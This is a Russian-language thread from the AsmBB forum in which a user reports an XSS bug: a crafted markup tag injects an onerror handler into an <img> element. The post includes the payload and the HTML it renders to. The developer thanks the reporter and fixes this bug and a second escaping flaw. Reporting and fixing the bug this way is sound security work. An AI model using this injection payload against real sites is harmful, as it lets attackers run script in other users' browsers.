AsmBB

Power
Login Register

XSS - Внедрение произвольного атрибута в <img>
0

#15297 (ツ) xmdsv
Created 13.01.2017, read: 4408 times

Вот XSS:

[![onerror=alert(String.fromCharCode(72,105,33,32,58,41))//]] 

Результат:

<img class="txt" src="[x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//]" alt="!<a href="x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//">x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//</a>" />

:)[x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//]

#15301 (ツ) johnfound
Created 12.01.2017, read: 4373 times

Ого! Спасибо!

#15310 (ツ) johnfound
Created 13.01.2017, read: 4260 times

Теперь должно быть в порядке.

#15311 (ツ) xmdsv
Created 13.01.2017, read: 4251 times
#15312 (ツ) johnfound
Created 13.01.2017, read: 4248 times
#15313 (ツ) xmdsv
Created 13.01.2017, read: 4246 times
#15314 (ツ) johnfound
Created 13.01.2017, read: 4240 times
xmdsv

Отсутствует екранизация спец-символов в отображаемом параметре s.

Спасибо. Исправлено.

#15315 (ツ) xmdsv
Created 13.01.2017, read: 4237 times
johnfound

Спасибо. Исправлено.

Ого, как быстро :)

#15316 (ツ) johnfound
Created 13.01.2017, read: 4233 times
xmdsv

Ого, как быстро :)

Потому что ассемблер – язык простой. ;)

XSS - Внедрение произвольного атрибута в <img>
0

AsmBB v2.9 (check-in: 072c21edcbadbc51); SQLite v3.31.1 (check-in: 3bfa9cc97da10598);
©2016..2020 John Found; Licensed under EUPL. Powered by Assembly language Created with Fresh IDE